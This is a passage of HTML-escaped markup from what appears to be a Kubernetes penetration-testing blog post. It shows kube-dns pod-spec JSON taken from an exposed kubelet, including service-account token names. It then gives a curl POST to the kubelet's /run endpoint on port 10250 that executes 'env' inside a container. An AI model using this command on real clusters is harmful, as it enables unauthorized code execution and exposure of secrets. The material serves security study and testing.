\u0026nbsp; \u0026nbsp; \"name\": \"kube-dns-5b8bf6c4f4\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"uid\": \"633db9d4-e43c-11e8-a104-42010a80038e\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"controller\": true\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; ]\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"spec\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"volumes\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"kube-dns-config\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"configMap\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"kube-dns\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"defaultMode\": 420\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"kube-dns-token-xznw5\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"secret\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"secretName\": \"kube-dns-token-xznw5\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"defaultMode\": 420\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"containers\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"dnsmasq\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"image\": \"gcr.io\/google-containers\/k8s-dns-dnsmasq-nanny-amd64:1.14.10\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"args\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"-v=2\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"-logtostderr\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"-configDir=\/etc\/k8s\/dns\/dnsmasq-nanny\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"-restartDnsmasq=true\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"-k\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--cache-size=1000\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--no-negcache\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--log-facility=-\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--server=\/cluster.local\/127.0.0.1#10053\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--server=\/in-addr.arpa\/127.0.0.1#10053\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"--server=\/ip6.arpa\/127.0.0.1#10053\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"ports\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"dns\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"containerPort\": 53,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"protocol\": \"UDP\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"dns-tcp\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"containerPort\": 53,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"protocol\": \"TCP\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"resources\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"requests\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"cpu\": \"150m\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"memory\": \"20Mi\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"volumeMounts\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"kube-dns-config\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"mountPath\": \"\/etc\/k8s\/dns\/dnsmasq-nanny\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"kube-dns-token-xznw5\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"readOnly\": true,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"mountPath\": \"\/var\/run\/secrets\/kubernetes.io\/serviceaccount\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; }\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; ],\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"livenessProbe\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"httpGet\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"path\": \"\/healthcheck\/dnsmasq\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"port\": 10054,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"scheme\": \"HTTP\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"initialDelaySeconds\": 60,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"timeoutSeconds\": 5,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"periodSeconds\": 10,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"successThreshold\": 1,\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"failureThreshold\": 5\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"terminationMessagePath\": \"\/dev\/termination-log\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"imagePullPolicy\": \"IfNotPresent\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; --------SNIP---------\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nWith the output of the running pods command you can craft your command to do the code exec\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ curl -k -XPOST \"https:\/\/k8s-node-1:10250\/run\/\u003Cnamespace\u003E\/\u003Cpodname\u003E\/\u003Ccontainer-name\u003E\" -d \"cmd=env\"\u003C\/container-name\u003E\u003C\/podname\u003E\u003C\/namespace\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003Eas an example:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca 